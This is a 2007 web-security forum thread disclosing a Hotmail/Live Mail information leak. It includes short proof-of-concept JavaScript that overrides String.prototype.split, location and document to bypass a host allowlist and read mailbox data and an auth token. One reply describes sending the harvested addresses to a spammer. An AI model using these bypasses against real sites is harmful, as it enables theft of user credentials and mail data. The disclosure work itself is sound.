Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Hotmail/Live Mail Information Disclosure vulnerability
Posted by: trev
Date: March 16, 2007 07:26PM

I discovered this hole in Hotmail/Live Mail over a month ago. The service is still not back up but I think I left Microsoft developers more than enough time. Interestingly, it is very similar to what Jeremiah Grossman found on Gmail a year ago.

The problem is this script: [www.hotmail.msn.com]. It is used on my.msn.com and live.com to display the mail widget - whether you have any new mails and similar information. Guess where this data came from? Right, from just that script, with a constant URL. The file started with something like this:

var iError = 0;
var strBaseURL = "http://by101fd.bay101.hotmail.msn.com/cgi-bin/sbox?";
var strGeoURL = "http://by101fd.bay101.hotmail.msn.com/cgi-bin/mymsn/mymsn.js?";	
var isFeatureOn = 1;
var iMaxMsgs = 10;
var strCurmbox = "curmbox=";
var strA = "a=";
var iStorageState = 1;
var iPercentUsed = 1;
var iMailboxSize = 0;
var iInboxTotal = 1;
var iNewInbox = 1;
var bIsNewMail = false;
var AmIDone = 0;
var iMsgsNum = 0;
var iMaxMailBoxSize = 2048000;
var aInboxView = new Array();

This is the information that anybody could access - guess this mailbox info wasn't worth protecting. But now comes the interesting part, namely the "protection":

var domains="www.msn.com|my.msn.com|t.msn.com|...another 100 host names";
var isValidDomain = false;
var domainsArray = domains.split("|");
for(i=0; i < domainsArray.length; i++)
{
if (window.location.host == domainsArray)
{
isValidDomain = true;
break;
}
}
if (isValidDomain)
{

It is followed by the really sensitive data that only the selected hosts are supposed to access:

bIsNewMail = 1;
strCurmbox	+= "00000000%2d0000%2d0000%2d0000%2d000000000001";
strA		+= "64f3b16907a2bbe2f9a52fee834b031ad624572b784e892b...";
strBaseURL	+= ("" + strCurmbox + "&" );
strGeoURL	+= ("" + strCurmbox + "&" + strA);
aInboxView[iMsgsNum++] = new objMsg("Smart Ways to Get the Most from MSN Hotma", "staff@hotmail.com", "Hotmail Staff", new Date(2007,1,08,13,28,21), 174, (strBaseURL+"rru=getmsg%3fcurmbox%3d00000000%252d0000%252d0000..."), new objIcon(1,0,0,0,3,0) );
AmIDone = 1;

Note that strA is apparently the authentication token that will allow you to do just about anything with the mail account. So all you need is to work around the protection. My first idea:

<script>
  String.prototype.split = function() {
    return [location.host];
  }
</script>
<script src="http://www.hotmail.msn.com/cgi-bin/mymsn/mymsn.js"></script>

All the sudden we are in the list of allowed hosts, at least with Opera or Firefox - Internet Explorer doesn't support changing String.prototype. That's the PoC I sent to Microsoft. The response: "we will eliminate using instrinsic javascript methods and replace it with a direct equality test". And they really did it, replaced the check with:

if (location.host == "www.msn.com" || location.host == "my.msn.com" || ...) {

My answer to this was that while I understand their attempts to solve this with little effort they won't come around making the location of this script dynamic (if they want to keep it). Next PoC:

var location = {host: "whatever you want", toString: function() {return this.host}};
var window = {location: location};

alert(window.location.host);
alert(window.location);
alert(location.host);
Yep, you can make location.host be whatever you want. But this time in Internet Explorer and Opera, Firefox protects window and location from being overwritten. The response to that was: "We are exploring moving for the short-term to the document.location property (instead of the global location property). While we are still testing this, it appears all attempts to override it are ignored." I started to feel ridiculous. This took me no more than two minutes:
var document = {location: {href: "test", toString: function() {return this.href}}};
alert(document.location);
alert(document.location.href);
alert(window.document.location);
And that's when the script finally went offline, one month ago. I don't know the plan but I hope it involves making the address of this script dynamic.



Edited 1 time(s). Last edit at 03/16/2007 07:31PM by trev.

Options: ReplyQuote
Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: kuza55
Date: March 17, 2007 07:17AM

Nice find, :)

Do you know of any way to solve the issue? Any way to reset the declarations for those objects/variables/functions? Because if there is, then microsoft's idea could be quite an efficient way to allow restricted cross site communications.

Options: ReplyQuote
Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: trev
Date: March 17, 2007 07:45AM

I don't think there is. JavaScript is a highly dynamic language, you cannot rely on anything. You probably could access the window object using "this" variable - it doesn't look like it can be manipulated. But then you need "this.location" and that one is easily overridden with a global variable called location. You probably could test whether it has been tampered with using this.hasOwnProperty("location") but IE doesn't support hasOwnProperty method. And even in Firefox hasOwnProperty is easily overridden.

Options: ReplyQuote
Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: jungsonn
Date: March 20, 2007 03:29PM

Trev; pretty advanced one, looks very nice!

my question: is this accessible through an URI? or does it requires modification through headers and such? or: is it easy to exploit? I viewed the code but can't find an entry where I could abuse remotely.

Options: ReplyQuote
Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: trev
Date: March 20, 2007 07:13PM

Jungsonn, you exploit it by including this script into any web page, see the code after "my first idea". After that you can put your own script that will read the variables set by mymsn.js and send the email addresses to a spammer's database for example.

Options: ReplyQuote
Re: Hotmail/Live Mail Information Disclosure vulnerability
Posted by: jungsonn
Date: March 20, 2007 07:40PM

That sounds cool. I read it a little more closely now and understand what you mean.

Wow, it's amazing they where so oblivious about JavaScript's power to overwrite certain set features.



Edited 1 time(s). Last edit at 03/20/2007 07:40PM by jungsonn.

Options: ReplyQuote


Sorry, only registered users may post in this forum.